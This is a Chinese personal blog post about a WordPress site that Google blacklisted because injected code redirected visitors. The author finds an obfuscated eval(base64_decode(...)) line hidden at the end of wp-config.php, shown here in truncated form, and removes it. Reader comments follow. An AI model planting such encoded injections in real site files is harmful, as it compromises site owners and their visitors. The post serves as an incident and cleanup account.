3月
06
2012

博客被黑

更新于: 2020 9月 8

前几天博客被谷歌列入 blacklist,用火狐去访问时老是给出警告,奇怪的是我用 IE 或者手机浏览器访问却是完全正常的。(后来我才明白,这是谷歌特有的黑名单制度哇)。忍受了好几天之后,受不了啦,决定去修复一下。

网上好多人都是说这种现象可能是 .htaccess 文件被篡改了,我去看了下,完全正常。

然后,又看了 wp-config.php, wp-load.php, wp-setting.php,也正常啊。

问小张客服,回答说“主题被挂马的可能性很大”,让“换个主题试试”,但是换了主题,问题依旧~

既然我的页面总是被重定向到 xxxxx.com 网站,我把整个网站目录下载下来,然后用 grep 命令搜索 xxxxx.com 字符串,却啥也没搜到。像是幽灵一样的神秘。

最后找到老外的救星了:

仔细检查了一下 wp-config.php,终于发现在第一行后面有如下诡异的代码:

eval(base64_decode('Ul9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzd
 ...省略...
 ZnJvbGluZy5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9');

难怪用 grep 搜索不到了,现在黑客都学聪明了,居然把恶意代码加密了。那个乱七八糟的字符串解密之后果然就包含有 xxxxx.com 这个网站。

可是为什么我刚开始看 wp-config.php 没看出来呢?黑客也确实狡猾,这个代码虽然很长,却全部都是写在一行里面的,而且缩进很深,我的文本编辑器又设为不自动换行,于是这些代码全部躲在第一行末尾,我居然都没看到!

果断删除之,世界恢复清净。

可惜对于这个权限为644的文件,黑客究竟是怎么写入的,我还是不清楚哇

posted in IT by billzt

Follow comments via the RSS Feed | Leave a comment | Trackback URL

Subscribe
提醒
guest

此站点使用Akismet来减少垃圾评论。了解我们如何处理您的评论数据

9 评论
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
清风
2012 年 3 月 6 日 20:24

这黑客也太厉害了!

张刚
2012 年 3 月 7 日 08:24

🙁 被黑过好几次了,慢慢都有对付的经验了

jiechic
2012 年 3 月 7 日 09:03

我还没被黑过,没这种经验,怎么办?

Mucid
2012 年 3 月 7 日 09:37

居然写到Wp-config了。。。
不过以前修改主题的时候,倒是用base64解码过footer.php

麦哥
2012 年 3 月 8 日 10:46

清除了就好,呵呵。

土木坛子
2012 年 5 月 5 日 12:57

有时数据库也会被污染的。常备份吧,xml格式导出也不错。

9
0
Would love your thoughts, please comment.x
()
x
 

Copyright © 2010-2020 | Powered by Wordpress and MySQL. Theme by Shlomi Noach, openark.org. Icon by Animaticons